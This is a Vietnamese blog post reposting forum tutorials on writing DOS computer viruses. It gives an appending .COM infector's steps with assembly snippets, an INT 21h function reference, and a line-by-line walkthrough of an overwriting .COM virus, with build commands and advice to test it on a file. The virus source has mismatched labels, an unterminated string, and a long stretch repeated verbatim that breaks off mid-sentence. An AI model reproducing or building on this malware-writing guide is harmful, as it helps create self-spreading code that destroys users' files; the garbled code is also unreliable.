Hướng dẫn lập trình virus

Tìm được thêm một bài viết nữa ở diễn đàn HVAOnline, đưa vào blog làm tài liệu
-------------------------------------------------------------------------------------------
Tác giả: spinx

Tôi có ý định trình bày các kỹ năng lập trình VR tuần tự từ các loại VR COM/EXE không thường trú trên DOS, VR có thướng trú, boot VR rồi mới sang win/unix nhằm tạo cho các bạn nắm được các kiến thức cơ bản trước. Tuy nhiên tôi thấy một số bạn quan tâm tới các kỹ thuật mới nhiều hơn vì vậy tôi sẽ cắt ngắn chương trình đào tạo. Chúng ta sẽ phân tích nhanh một VR file COM trên DOS để lấy khái niệm rồi bài sau sẽ đi vào VR trên win và unix luôn. Sau các bài này khi các bạn đã tự thực hành và trở thành VXer, các bạn nào muốn nâng cao trình độ có thể thảo luận về các kỹ thuật nâng cao trong bài Kỹ thuật lập trình VR của tôi.

Như ta đã phân tích ở bài trước, VR COM sẽ làm thao tác nối (append) chính nó vào chương trình của nạn nhân. Yêu cầu của VR là nắm quyền kiểm soát trước khi chương trình gốc chạy. Chính vì vậy VR sẽ thay đổi code ở đầu chương trình gốc để tạo một lệnh nhảy xuống đoạn mã VR mới nối thêm. Sau khi VR chạy xong, đoạn mã gốc sẽ được phục hồi VR sẽ trả lại quyền điều khiển để chương trình gốc có thể chạy bình thường. Chính vì vậy nạn nhân vẫn có thể ung dung hút thuốc làm việc bình thường mà không biết máy tính đã nhiễm VR.
Hình vẽ sau mô tả hoạt động của một VR. Tôi rất muỗn đưa ra nhiều hình vẽ minh hoạ nhưng không biết làm thế nào, các bạn xem tạm vậy.

. . . . . . . . . . . . . . . . . . . . . |Jump VR|
------------. . ---------. . . . . . ---------
| File. . . | + |Virus. | ===>|File. . |
-----------. . ----------. . . . . ---------
. . . . . . . . . . . . . . . . . . . . . |Virus. |

Tất nhiên các bạn có thể dễ dàng nhận ra có cách khác là đẩy chương trình gốc ra sau VR theo dạng

------------. . ---------. . . . . . ---------
| File. . . | + |Virus. | ===>|Virus. |
-----------. . ----------. . . . . ---------
. . . . . . . . . . . . . . . . . . . . . |File. . |

Tuy nhiên cách này thường không được sử dụng vì chạy chậm hơn nhiều. Tổng kết khái niệm ở đây chỉ còn là: VR và tệp tin sau khi lây nhiễm sẽ được hợp làm một, VR nắm quyền điều khiển chương trình và được chạy trước, chương trình gốc sẽ được trả lại nguyên vẹn và chạy sau khi VR kết thúc. Dựa trên nguyên tắc này các cách đã trình bày là phương pháp cơ bản còn thực ra các bạn có thể sáng tạo tuỳ theo ý mình để đạt được mục đích.
Sơ đồ sau là diễn giải một tệp .COM trước và sau khi lây nhiễm:

Bat dau ct |-------------------|. . . . . |----------------------|
. . . . . . . . | Ma dau ct cu. |--|. . . | Ma jump cho VR |--|
. . . . . . . . |-------------------|. |. . . |----------------------|. |
. . . . . . . . |. . . . . . . . . . . . |. |. . . |. . . . . . . . . . . . . |. |
. . . . . . . . |. . . . . . . . . . . . |. |. . . |. . . . . . . . . . . . . |. |
. . . . . . . . |. . . . . . . . . . . . |. |. . . |. . . . . . . . . . . . . |. |
. . . . . . . . |. . . . . . . . . . . . |. |. . . |. . . . . . . . . . . . . |. |
. . . . . . . . |. . . . . . . . . . . . |. |. . . |. . . . . . . . . . . . . |. |
. . . . . . . . |. . . . . . . . . . . . |. |. . . |. . . . . . . . . . . . . |. |
. . . . . . . . |. . . . . . . . . . . . |. |. . . |. . . . . . . . . . . . . |. |
. . . . . . . . |. . . . . . . . . . . . |. |. . . |. . . . . . . . . . . . . |. |
. . . . . . . . |-------------------|. |. . . |----------------------|. |
. . . . . . . . . . . . . . . . . . . . . . |---->| Ma dau ct cu. . . |. |
. . . . . . . . . . . . . . . . . . . . . . . . . . |----------------------|. |
. . . . . . . . . . . . . . . . . . . . . . . . . . |. . . . . . . . . . . . . |<-|
. . . . . . . . . . . . . . . . . . . . . . . . . . |. Ma VR. . . . . . . |
. . . . . . . . . . . . . . . . . . . . . . . . . . |. . . . . . . . . . . . . |
. . . . . . . . . . . . . . . . . . . . . . . . . . |----------------------|

Thao tác lây nhiễm của một VR .com là
1. Mở file .com
2. Lưu ngày giờ tạo file
3. Lưu các bytes đầu CT gốc (thường là 3)
4. Tính lệnh nhảy tới VR (cuối CT)
5. Ghi lệnh nhảy đè lênh các bytes đầu
6. Nối VR vào cuối CT gốc
7. Phục hồi lại ngày giờ tạo file
8. Đóng file

Vậy những gì ta sẽ phải làm khi VR nắm quyền điều khiển? Tất nhiên là tìm kiếm các tệp .com chưa lây nhiễm ở xung quanh và bắt đầu lây nhiễm

Thực hành:
Bắt đầu một VR đơn giản:

.model tiny
.code

org 0100h

jump_to_VR:
db 0E9h,0,0 ; jmp start
start:
call get_addr
db 0b8h ;<== đánh lạc hướng disassembler (xem bài Kỹ thuật lập trình VR)
get_addr:
pop bp

Như vậy ta đã có một khởi đầu của VR. Đối với VR thường trú đây là lúc ta ém quân lên bộ nhớ bẫy ngắt và chờ đợi. Với một VR không thường trú bây giờ sẽ là thao tác ta tìm kiếm các tệp *.com để lây lan. Tôi giả định bạn là người lạp trình ASM cơ bản có nghĩa là có thể sử dụng các ngắt của dos. Vậy thì thao tác tìm kiếm các tệp đuôi *.com trong thư mục chẳng có gì khó phải không. Tôi gơi ý dùng hàm 47h ngắt 21h, hàm 4Eh ngắt 21h (find first), hàm 4Fh ngắt 21h (find next) để tìm kiếm.

Chú ý vì VR của ta được nối vào cuối một chương trình khác nên các offset sẽ bị đảo lộn hết. Không nên dùng các offset tuyệt đối mà chỉ sử dụng tương đối qua thanh ghi bp. Ở đoạn ví dụ trên, ta có trong thanh bp giá trị offset của nhãn get_addr như vậy muốn lấy địa chỉ một biến xxx ta làm như sau:

get_addr:
pop bp
;.......
; Code Virus here
;.......
lea dx, [bp+offset COMmask-offset get_addr]
;....

xxx db “*.COM”,0

Sau khi có tên file .com, quy trình lây nhiễm 8 bước ở trên thì cũng không có gì phức tạp:
1. Mở file:
;offset tên file nạp vào ==> dx
mov ax, 3D02h ; Open R/O
int 21h
xchg ax, bx ; Handle in BX
2. Lấy ngày giờ tạo file
mov ax, 5700h ; get file time/date
int 21h
push cx
push dx
3. Đọc các bytes đầu
mov ah, 003Fh
mov cx, 001Ah
lea dx, [bp+offset readbuffer-offset get_addr]
int 21h

Các bạn có thể đặt vài ký hiệu trên đầu sau lệnh nhảy nhằm kiểm tra nếu tệp đã bị lây nhiễm thì không lây nhiễm lại.

4. Tính lệnh jmp đến cuối file
xor cx, cx
xor dx, dx
mov ax, 4202h
int 21h ;<== Lấy kích thước tệp

Với:
JmpCode:db 0E9h,00,00

Lúc này ta có thể ghi lệnh nhảy mới vào tệp .com bằng lệnh:
mov word ptr ds:[bp+offset JmpCode-Offset get_addr+1],ax ;Địa chỉ jmpcode + 1
xor cx,cx
xor dx,dx
mov ax,4200h
int 21h
mov ah,40h
mov dx,<địa chỉ jmpCode>
mov cx,4
int 21h
5. Nối VR vào cuối tệp
mov ah,40h
mov dx,<địa chỉ start>
mov cx,
int 21h
6. Phục hồi ngày giờ
mov ax, 5701h ; restore file time/date
pop dx
pop cx
int 21h
7. Đóng tệp
mov ah,3eh
int 21h

Đọc đám code này có thể bạn không hiểu, OK. Chỉ cần ghi nhớ là
1. Bạn sẽ dùng các lệnh đọc/ghi tệp ghi nội dung VR vào cuối chương trình gốc
2. Ghi lệnh nhảy gồm3 bytes E9h, <2> vào đầu ct gốc

Kết thúc quá trình lây lan, hãy move trả các bytes gốc trở về offset 100h và nhảy về đó

Đến đây ta kết thúc một VR .com không thường trú.

Câu hỏi và bài tập:
1. Tập viết một chương trình bằng ASM hiển thị tất cả các tệp *.com trong thư mục hiện hành và gốc c:\
2. Viết một chương trình nối một đoạn mã vào một tệp
3. Hãy nghiên cứu và trả lời các câu hỏi sau:
- Thông thường kích thước tối đa của một tệp .com trên dos là bao nhiêu
- Lệnh nhảy gần có mấy bytes và ý nghĩa từng byte
- Khoảng cách tối đa của một lệnh nhảy gần
Câu hỏi nâng cao:
- Di rời một đoạn mã máy từ vị trí này sang vị trí khác trên bộ nhớ sẽ có ảnh hưởng thế nào đến các lệnh nhảy và call

Nếu không có ai yêu cầu tôi sẽ bỏ qua các dạng VR khác và VR thường trú để giới thiệu về VR for win32 và các kỹ thuật nâng cao trong các bài sau

Sử dụng các hàm của ngắt 21h trong DOS

Ngôn ngữ ASM là một ngôn ngữ cấp thấp, nó tác động đến hệ thống, vì vậy chủ yếu sử dụng các lệnh ngắt của DOS để điều khiển. Các ngắt của DOS rất nhiều cần phải có một thời gian dài để tìm hiểu, chỉ riêng có ngắt 21h thui thì cũng đã có rất nhiều hàm rùi, thật là phức tạp, dưới đây là một số hàm thông dụng của ngắt 21h được sử dụng ở bài "VIẾT MỘT VIRUS GHI ĐÈ LÊN FILE *.COM BẰNG ASM":

Hàm 4Eh: Hàm tìm file đầu tiên

In:
AH 4Eh
DS:DX Chuỗi chỉ định file cần tìm kiếm
CX Thuộc tính của file
CX = 0 => một file bình thường
CX = 3 => readonly, hidden, system
CX = 8 => chỉ tìm trong thư mục gốc
Out:
Nếu lỗi thì cờ Carry (CF) được bật
Nếu không lỗi thì trả về AX
AX Trả về DTA là thông tin file được tìm thấy bắt đầu tại 80h (thường thì cần lấy tên file được bắt đầu tại offset 1eh của DTA vì vậy để chỉ đến tên file thì ta có được địa chỉ: 80h+1eh = 9eh)

Ví dụ:
MOV AH,4Eh
XOR CX,CX ;sét CX = 0
MOV DX,offset "*.COM"
int 21h

Hàm 4Fh: Hàm tìm file tiếp theo

In:
AH 4Fh
Out:
Nếu lỗi thì cờ Carry (CF) được bật
Nếu không lỗi thì trả về AX
AX chứa DTA

Hàm 3Dh: Hàm mở file

In:
AH 3Dh
AL Chế độ mở file (00 = readonly, 01 = writeonly, 02 = Read and Write)
DS:DX Địa chỉ của file cần mở

Hàm 3Eh: Hàm đóng file

In:
AH 3Eh
BX Chứa file cần đóng (đã được mở ở hàm 3Dh)

Hàm 40h: Hàm ghi file

In:
AH 40h
BX chứa file cần ghi
CX chứa số byte cần ghi
DX Chứa địa chỉ nội dung file ghi

Hàm 09h: Hàm hiển thị chuỗi

In:
AH 09h
DS:DX chứa chuỗi hiển thị, cuối chuỗi phải có '$' để kết thúc.

Coi phần ví dụ minh họa trong bài viết "VIẾT MỘT VIRUS GHI ĐÈ LÊN FILE *.COM BẰNG ASM"

VIẾT MỘT VIRUS GHI ĐÈ LÊN FILE *.COM BẰNG ASM

Sau những ngày vất vả với bác Google để tìm tài liệu và bài viết về virus, thì cuối cùng mình cũng tìm được "Phao cứu sinh" - một bài hướng dẫn rõ ràng viết một con virus, đọc cái này mình đã hiểu được sơ sơ về các mã hợp ngữ mà lâu nay mình vẫn điên đầu với nó (đọc mà chả có hiểu gì hết). Hi vọng sau khi đọc hiểu xong bài này mình sẽ tìm được hướng đi cho đề tài khóa luận của mình. Mượn bài của bác BacNinhOnline trong diễn đàn tin học đưa vào Blog mình để làm tài liệu tham khảo (đỡ phải mất công search với bác Google nữa). Để hiểu rõ được cách sử dụng các ngắt của DOS mình cũng cần phải sử dụng kèm techhelp để tra các ngắt của DOS.

VIẾT MỘT VIRUS GHI ĐÈ LÊN FILE *.COM BẰNG ASM

(Sử dụng tài liệu của nhóm Code Breaker)

Trước tiên hãy xem đoạn mã của virus:

code segment

assume cs:code,ds:code

org 100h

virus proc near

first_file:

mov ah,4eh

tim_file:

xor cx,cx

lea dx,comsig

int 21h

jc ketthuc

mo_file:

mov ax,3d02h

mov dx,9eh

int 21h

nhiem_file:

xchg bx,ax

mov ah,40h

mov cx,offset horny - offset first_fly

lea dx,first_fly

int 21h

stitch_up:

mov ah,3eh

int 21h

mov ah,4fh

jmp find_fly

ketthuc:

mov ah,09h

mov dx,offset wart

int 21h

cya: int 20h

comsig db "*.com",0

msgadd db 'Congratulations! You have infected all the COM files

in this ',10,13

db 'directory . Have a

nice day.',10,13,'
horny label near

virus endp

code ends

end first_fly
Virus của chúng ta sẽ là một file .com ,giới hạn của *.com file là 65,536 bytes.Qua virus này bạn sẽ biết được định dạng chung của một file .com, chúng ta hãy phân tích đoạn mã trên:

================================================== ======

code segment

tất cả những mã có thể thi hành nằm trong code segment , tất nhiên không nhất thiết segment phải có tên là code, cấu trúc khai báo là như sau:

segment_name segment

------------

----------

----------

segment_name Ends

end
Nếu bạn đã hoc Asembly thì không cần phải đọc chỗ này.

================================================== ======

assume cs:code,ds:code

Nói chung đây là phần thiết đặt tham số cho file .com của chúng ta, với

CS(code segment) là nơi chứa địa chỉ bắt đầu thực thi của chương trình.

org 100h

org 100h luôn luôn đi theo assume directive. Nó thông báo cho máy tính biết rằng file COM đuợc xác đình tại địa chỉ 100 hex hay 256 bytes.

================================================== ======

proc virus near
Cái này không thực sự cần thiết vì procedure này là chương trình con duy nhất trong chương trình.Những chương trình lớn hơn sẽ có nhiều Procedure trong code segment để thức hiện một nhiệm vụ nhất định nào đó. ================================================== ======

first_file:

mov ah,4eh

Bậy giờ là phần cốt lõi của virus ,nếu bạn đã hoc lập trình thì các bạn cũng biết nhựng cái theo sau là dấu hai chấm được gọi là nhãn, nó hữ­ ích cho việc xác định vị trí để xài các lệnh nhảy trong ASM hay lệnh goto trong Pascal,delphi...

Để phân tích tiếp chúng ta cần biết thanh ghi là gì?Một thanh ghyi được sử dụng để khởi đầu chỉ lệnh để máy tính thi hành một yêu cầu hoạt động ,được sử dụng để ghi địa chỉ bộ nhớ và chuẩn bị những hàm số học cơ bản , nhập xuất dữ liệu... .Bốn thanh ghi cơ bản sử dụng trong virus này là AX, BX, CX, DX (). Thanh ghi ax sử dụng cho nhập xuất và các thao tác tính toán cơ bản BX (base register) sử dụng để tính toán CX (count register ) sử dụng để tính toán hay đếm trong vòng lặp. DX (data register ) giống như AX , được sử dụng cho nhập xuất , hoạt động nhân chia

Bây giờ trở lại với virus của chúng ta mục đích cua get_fly là tìm thấy file để làm nhiễm. Thực sự là tìm file đầu tiên trong thư mục có thuộc tính chúng ta cần. Vì vậy,chúng tac ần nạp điều kiện vào thanh ghi chung và thực hiện một lệnh ngắt. Ơû đây do là một chương trình DOS nên chỉ đề cập đến thanh ghi 16 bit , môt thanh ghi 16 bit gồm 2 phần, mỗi phần 8 bit ví dụ AX:AH-AL tương tự như vậy ta có : BH - BL, CH - CL, va’ DH - DL. Giá trị cần nạp vào thanh ghi chung là 4e hex vào AH, CX = zero để set thuộc tính của file là normal, và cuối cùng, DX cần một chuỗi chỉ đính file mà chúng ta đang tìm kiếm để làm nhiễm. Và để di chuyển 4e hex vao’ AH chúng ta sử dụng lệnh MOV. MOV AH, 4eh có nghĩa là chuyển giá trị 4e hex vào AH

==================================================

tim_file:

xor cx,cx
Việc tiếp theo cần làm là giá trị trong CX =0, chúng ta có thể làm bằng 2 cách , một là MOV CX, 0, hai là XOR CX, CX tuy nhiên nấu sử dụng MOV CX,0 chúng ta sẽ mất 3 bytes trong khi sử dụng XOR CX,CX chúng ta chỉ mất 2 bytes và chúng đều có chức năng set cho CX =0. Vậy thì tốt hơn là nên chọn XOR CX,CX

==================================================

lea dx,comsig

Tiếp theo chúng ta cần nạp chuỗi với file chỉ định mà chúng ta tìm kiếm vào DX.

Chúng ta đang tìm file . COM. Vi vay chuỗi cần tìm là *.COM. Đây là cách tìm kiếm những tập tin có đuôi là *.COM. Chuỗi này được xác định tại địa chỉ comsig trong data segment của virus . Và để chuyển chuỗi đó vào DX chúng ta thực hiện lệnh

LEA DX, comsig, Load the Effective Address of comsig into DX. Chúng ta cũng có thể sử dụng lệnh MOV bằng cách như sau

MOV DX, offset comsig. ==================================================

int 21h

Nói chung lệnh ngắt để dừng chương trình lại và thực hiện một công việc nào đó .Có 256 lệnh ngắt các bạn có thể tham khảo thêm ở các sách dạy hợp ngữ .Ở đoạn mã này của virus sau khi chuyển 4e hex vào AX xóa CX, chuyển chuỗi chỉ định tên file cần tìm ta thực hiện lệnh ngắt int 21 để chương trình bắt đầu tìm tệp đầu tiên với thuôc tính cho trước trong CX và DX (các bạn tra trong sách hợp ngữ về các chức năng của ngắt int 21 để biết thêm chi tiết)

==================================================

jc ketthuc

Đây là một lệnh nhảy có điều kiên’. Nếu một file được tìm thấy cờ carry được set là zero nếu không tìm thấy cờ carry set thành 1 lệnh JC kiểm tra nếu cờ carry bằng 1nó sẽ nhảy tới vị trí có nhãn wart_growth và thi hành lệnh tại offset đó .Và đoạn mã này có chức nằng như sau: nó kiểm tra xem nếu tìm thấy thì tiến hành các bước làm nhiễm file nếu không thì nhãy tời đoạn mã báo hiệu bạn đã làm nhiễm thành cộng tất cả các file .Com trong thư mục chứa nó .

================================================== ===========

mo_file:

mov ax,3d02h

mov dx,9eh

int 21h
Đoạn mã này được thực hiện khi đã tìm thấy một file .COM trong thư mục đầu tiên cần nạp 3D vào AL và 02h có nghĩa là mở file trong chế độ đọc/ghi. 00h trong AL sẽ mở file ở chế độ chỉ đọc , 01h trong AL là chỉ ghi. Nhớ rằng AX là thanh ghi 16-bit gồm, AH và AL.Vi vay chúng ta có thể nạp hai giá trị cùng lúc . bằng cách nạp AX với 3d02h. Nhớ rằng chúng ta luôn luôn sử dụng gia’ trị ở hệ hex. Một lỗi đơn giản nhưng hay gặp phải là thiếu "h" sau int 21 hay sau các số ở hệ HEX bạn cần chú ý . Nếu thiếu Hex máy tính sẽ nghĩ bạn sử dụng hệ thập phân và dĩ nhiên trong hệ thập phân máy tính sẽ coi D,E,F chả ra củ khoai gì .... Tiếp theo chúng ta cần nạp vào DX một chuỗi ASCII là tên của file .Như bạn nhìn ở trên 9e hex không phải là một chuỗi ;nó thực ra là offset của địa chỉ chứa chuỗi chúng ta cần. 9e hex được xác định trong PSP trong một vùng gọi là DTA hay Disk Transfer Area. PSP bắt đầu tại 00h. Địa chỉ bắt đầu của DTA la’ 80 hex.Trong DTA là thông tin trên file đã được tìm thấy. Những gì chúng ta cần là file name, được xác định tại offset 1eh từ phần bắt đầu của DTA. Cộng 80 với 1eh ta có 9eh. Nạp 9e hex vào thanh ghi DX chúng ta có file name . bây giờ thức hiện int 21h để thi hành thủ tục trên.

==============================================================
nhiem_file:

xchg bx,ax

mov ah,40h

mov cx,offset horny - offset first_fly

lea dx,first_fly

int 21h
Đây là phần làm nhiễm file sau khi đã mở nó .Ở đoạn mã trước File handle của file được mở nằm trong AX chúng ta cần nó nằm trong BX vậy nên thực hiện lệnh

xchg bx,ax bằng cách này toàn bộ giá trị trong ax sẽ chuyển vào bx . CX cần được nạp một số lượng byte mà chúng ta muốn ghi vào. Và thay vì ta sử dụng một con số nào đó để chỉ định số bytes ta để máy tính tính khoảng cách từ 2 offset nhãn horny và firts_fly như vậy khoảng cách từ nhãn first_fly đến horny là số lượng bytes mà chúng ta muốn ghi vào file. Cuối cùng, DX cần được nạp địa chỉ mà chúng ta muốn ghi và địa chỉ cua’ first_fly được nạp vào DX. Đó là phần bắt đầu của mã mà chúng ta muốn ghi vào file tìm thấy .Sau đó thực hiện int 21 sẽ hoàn tất việc làm nhiễm file.

================================================== ==

stitch_up:

mov ah,3eh

int 21h

mov ah,4fh

jmp find_fly


Sau khi file đã bị nhiễm chúng ta cần đóng file đó lại và đây là đoạn mã thực hiện việc này. Sau khi đóng file chúng ta nạp 4f hex vào AH rồi nhảy trở về đoạn mã để tìm file .COM kế tiếp. Và nó sẽ thực hiện việc nhiễm file cho đến khi nào tất cả file .COM trong thu muc chưa nó đã bị nhiễm.Lúc đó cờ carry=1 và lệnh nhảy jc sẽ hoạt động đưa ra thông báo chúc mừng.

==================================================

Ketthuc:

mov ah,9

mov dx,offset wart

int 21h


==================================================

cya: int 20h

Chức năng của int 20 là kết thúc chương trình , tuy nhiên cách hiện nay hay dùng là MOV AH,4CH

int 21

==================================================

comsig db "*.com",0

msgadd db 'Congratulations! You have infected all the COM files

in this',10,13

db 'Have a nice day.',10,13,'$'

Đây là data segment nói một cách nọm na là tương tự như bạn khai báo hằng (Const) ở pascal,C++ vậy.Và các hằng này sẽ được sử dụng trong code segment. Chúng ta sử dụng định nghĩa byte DB, để định nghĩa một chuỗi. Việc đặt 10,13 sau các chuỗi giúp cho việc hiển thị nó có thứ tự nếu không cả hai chuỗi sẽ hiển thị cùng lúc lên màn hinh $ tại phần cuối của dòng 2 báo hiệu kết thúc chuôi ==================================================

horny label near

nhãn horny chỉ có một mục đích là để xác điịnh offset trong việc xác định số byte ghi vào file cần làm nhiễm
======================================================

virus endp

code ends

end first_fly

kết thúc chương trình
==================================================

Biên dịch virus :

Bạn cần có TASM hay MASM. Trongbài này tôi hướng dẫn các bạn biên dịch virus bằng TASM. Các file cần có virus.asm TASM.EXE, TLINK

Đầu tiên lưu nó thành file ".asm" file,có thể sử dụng Notepad để soạn thảo mã rồi save as virus.asm. Sử dụng TASM gõ lệnh:

C:\>tasm virus.asm

Kết quả có thể là như sau:

Turbo Assembler Version 2.01

Assembling file: virus.asm

Error Messages: none

Warning Messages: none

Passes: 1

Remaining Memory: 418k (or something similar)

Nếu không có lỗi nào, nếu có lỗi nó sẽ báo cho bạn biết lỗi gì ở dòng nào .

Sau khi gõ lệnh TASM [asm] bạn sẽ được file *.obj

Để tạo COM file bạn gõ lệnh:

C:\>tlink /t virus.obj

Tlink sẽ tạo ra file virus.COM

Bây giờ hãy thử nghiệmvirus của bạn, mở Notepad lên, ghi gì tùy bạn , không ghi cũng được lưu thành file vidu.com. đặt nóvào thư muc của virus bạn vừa biên dịch. Rồi chạy virus bạn sẽ thấy kích thước của file vidu.com bây giờ sẽ bằng kích thước của virus(180 bytes). Tuy nhiên nhược virus này sẽ làm nhiễm tất cả các file .com trong thư mục chứa nó mà không cần biết file đó đã bị nhiễm hay chưa, ở phần sau tôi sẽ hướng dẫn các bạn cách để kiểm tra xem một file đã bị nhiễm hay chưa. Và cònmột điều nữa là virus này không có tác dụng với những file .com có size lớn hơn nó (đây chỉ là để minh họa nên tôi nghĩ như vậy là đủ)

horny label near

virus endp

code ends

end first_fly
Virus của chúng ta sẽ là một file .com ,giới hạn của *.com file là 65,536 bytes.Qua virus này bạn sẽ biết được định dạng chung của một file .com, chúng ta hãy phân tích đoạn mã trên:

================================================== ======

code segment

tất cả những mã có thể thi hành nằm trong code segment , tất nhiên không nhất thiết segment phải có tên là code, cấu trúc khai báo là như sau:

segment_name segment

------------

----------

----------

segment_name Ends

end
Nếu bạn đã hoc Asembly thì không cần phải đọc chỗ này.

================================================== ======

assume cs:code,ds:code

Nói chung đây là phần thiết đặt tham số cho file .com của chúng ta, với

CS(code segment) là nơi chứa địa chỉ bắt đầu thực thi của chương trình.

org 100h

org 100h luôn luôn đi theo assume directive. Nó thông báo cho máy tính biết rằng file COM đuợc xác đình tại địa chỉ 100 hex hay 256 bytes.

================================================== ======

proc virus near
Cái này không thực sự cần thiết vì procedure này là chương trình con duy nhất trong chương trình.Những chương trình lớn hơn sẽ có nhiều Procedure trong code segment để thức hiện một nhiệm vụ nhất định nào đó. ================================================== ======

first_file:

mov ah,4eh

Bậy giờ là phần cốt lõi của virus ,nếu bạn đã hoc lập trình thì các bạn cũng biết nhựng cái theo sau là dấu hai chấm được gọi là nhãn, nó hữ­ ích cho việc xác định vị trí để xài các lệnh nhảy trong ASM hay lệnh goto trong Pascal,delphi...

Để phân tích tiếp chúng ta cần biết thanh ghi là gì?Một thanh ghyi được sử dụng để khởi đầu chỉ lệnh để máy tính thi hành một yêu cầu hoạt động ,được sử dụng để ghi địa chỉ bộ nhớ và chuẩn bị những hàm số học cơ bản , nhập xuất dữ liệu... .Bốn thanh ghi cơ bản sử dụng trong virus này là AX, BX, CX, DX (). Thanh ghi ax sử dụng cho nhập xuất và các thao tác tính toán cơ bản BX (base register) sử dụng để tính toán CX (count register ) sử dụng để tính toán hay đếm trong vòng lặp. DX (data register ) giống như AX , được sử dụng cho nhập xuất , hoạt động nhân chia

Bây giờ trở lại với virus của chúng ta mục đích cua get_fly là tìm thấy file để làm nhiễm. Thực sự là tìm file đầu tiên trong thư mục có thuộc tính chúng ta cần. Vì vậy,chúng tac ần nạp điều kiện vào thanh ghi chung và thực hiện một lệnh ngắt. Ơû đây do là một chương trình DOS nên chỉ đề cập đến thanh ghi 16 bit , môt thanh ghi 16 bit gồm 2 phần, mỗi phần 8 bit ví dụ AX:AH-AL tương tự như vậy ta có : BH - BL, CH - CL, va’ DH - DL. Giá trị cần nạp vào thanh ghi chung là 4e hex vào AH, CX = zero để set thuộc tính của file là normal, và cuối cùng, DX cần một chuỗi chỉ đính file mà chúng ta đang tìm kiếm để làm nhiễm. Và để di chuyển 4e hex vao’ AH chúng ta sử dụng lệnh MOV. MOV AH, 4eh có nghĩa là chuyển giá trị 4e hex vào AH

==================================================

tim_file:

xor cx,cx
Việc tiếp theo cần làm là giá trị trong CX =0, chúng ta có thể làm bằng 2 cách , một là MOV CX, 0, hai là XOR CX, CX tuy nhiên nấu sử dụng MOV CX,0 chúng ta sẽ mất 3 bytes trong khi sử dụng XOR CX,CX chúng ta chỉ mất 2 bytes và chúng đều có chức năng set cho CX =0. Vậy thì tốt hơn là nên chọn XOR CX,CX

==================================================

lea dx,comsig

Tiếp theo chúng ta cần nạp chuỗi với file chỉ định mà chúng ta tìm kiếm vào DX.

Chúng ta đang tìm file . COM. Vi vay chuỗi cần tìm là *.COM. Đây là cách tìm kiếm những tập tin có đuôi là *.COM. Chuỗi này được xác định tại địa chỉ comsig trong data segment của virus . Và để chuyển chuỗi đó vào DX chúng ta thực hiện lệnh

LEA DX, comsig, Load the Effective Address of comsig into DX. Chúng ta cũng có thể sử dụng lệnh MOV bằng cách như sau

MOV DX, offset comsig. ==================================================

int 21h

Nói chung lệnh ngắt để dừng chương trình lại và thực hiện một công việc nào đó .Có 256 lệnh ngắt các bạn có thể tham khảo thêm ở các sách dạy hợp ngữ .Ở đoạn mã này của virus sau khi chuyển 4e hex vào AX xóa CX, chuyển chuỗi chỉ định tên file cần tìm ta thực hiện lệnh ngắt int 21 để chương trình bắt đầu tìm tệp đầu tiên với thuôc tính cho trước trong CX và DX (các bạn tra trong sách hợp ngữ về các chức năng của ngắt int 21 để biết thêm chi tiết)

==================================================

jc ketthuc

Đây là một lệnh nhảy có điều kiên’. Nếu một file được tìm thấy cờ carry được set là zero nếu không tìm thấy cờ carry set thành 1 lệnh JC kiểm tra nếu cờ carry bằng 1nó sẽ nhảy tới vị trí có nhãn wart_growth và thi hành lệnh tại offset đó .Và đoạn mã này có chức nằng như sau: nó kiểm tra xem nếu tìm thấy thì tiến hành các bước làm nhiễm file nếu không thì nhãy tời đoạn mã báo hiệu bạn đã làm nhiễm thành cộng tất cả các file .Com trong thư mục chứa nó .

==================================================

mo_file:

mov ax,3d02h

mov dx,9eh

int 21h
Đoạn mã này được thực hiện khi đã tìm thấy một file .COM trong thư mục đầu tiên cần nạp 3D vào AL và 02h có nghĩa là mở file trong chế độ đọc/ghi. 00h trong AL sẽ mở file ở chế độ chỉ đọc , 01h trong AL là chỉ ghi. Nhớ rằng AX là thanh ghi 16-bit gồm, AH và AL.Vi vay chúng ta có thể nạp hai giá trị cùng lúc . bằng cách nạp AX với 3d02h. Nhớ rằng chúng ta luôn luôn sử dụng gia’ trị ở hệ hex. Một lỗi đơn giản nhưng hay gặp phải là thiếu "h" sau int 21 hay sau các số ở hệ HEX bạn cần chú ý . Nếu thiếu Hex máy tính sẽ nghĩ bạn sử dụng hệ thập phân và dĩ nhiên trong hệ thập phân máy tính sẽ coi D,E,F chả ra củ khoai gì .... Tiếp theo chúng ta cần nạp vào DX một chuỗi ASCII là tên của file .Như bạn nhìn ở trên 9e hex không phải là một chuỗi ;nó thực ra là offset của địa chỉ chứa chuỗi chúng ta cần. 9e hex được xác định trong PSP trong một vùng gọi là DTA hay Disk Transfer Area. PSP bắt đầu tại 00h. Địa chỉ bắt đầu của DTA la’ 80 hex.Trong DTA là thông tin trên file đã được tìm thấy. Những gì chúng ta cần là file name, được xác định tại offset 1eh từ phần bắt đầu của DTA. Cộng 80 với 1eh ta có 9eh. Nạp 9e hex vào thanh ghi DX chúng ta có file name . bây giờ thức hiện int 21h để thi hành thủ tục trên.
==============================================================
nhiem_file:

xchg bx,ax

mov ah,40h

mov cx,offset horny - offset first_fly

lea dx,first_fly

int 21h
Đây là phần làm nhiễm file sau khi đã mở nó .Ở đoạn mã trước File handle của file được mở nằm trong AX chúng ta cần nó nằm trong BX vậy nên thực hiện lệnh

xchg bx,ax bằng cách này toàn bộ giá trị trong ax sẽ chuyển vào bx . CX cần được nạp một số lượng byte mà chúng ta muốn ghi vào. Và thay vì ta sử dụng một con số nào đó để chỉ định số bytes ta để máy tính tính khoảng cách từ 2 offset nhãn horny và firts_fly như vậy khoảng cách từ nhãn first_fly đến horny là số lượng bytes mà chúng ta muốn ghi vào file. Cuối cùng, DX cần được nạp địa chỉ mà chúng ta muốn ghi và địa chỉ cua’ first_fly được nạp vào DX. Đó là phần bắt đầu của mã mà chúng ta muốn ghi vào file tìm thấy .Sau đó thực hiện int 21 sẽ hoàn tất việc làm nhiễm file.

==================================================

stitch_up:

mov ah,3eh

int 21h

mov ah,4fh

jmp find_fly


Sau khi file đã bị nhiễm chúng ta cần đóng file đó lại và đây là đoạn mã thực hiện việc này. Sau khi đóng file chúng ta nạp 4f hex vào AH rồi nhảy trở về đoạn mã để tìm file .COM kế tiếp. Và nó sẽ thực hiện việc nhiễm file cho đến khi nào tất cả file .COM trong thu muc chưa nó đã bị nhiễm.Lúc đó cờ carry=1 và lệnh nhảy jc sẽ hoạt động đưa ra thông báo chúc mừng.

==================================================

Ketthuc:

mov ah,9

mov dx,offset wart

int 21h


================================================== ================

cya: int 20h

Chức năng của int 20 là kết thúc chương trình , tuy nhiên cách hiện nay hay dùng là MOV AH,4CH

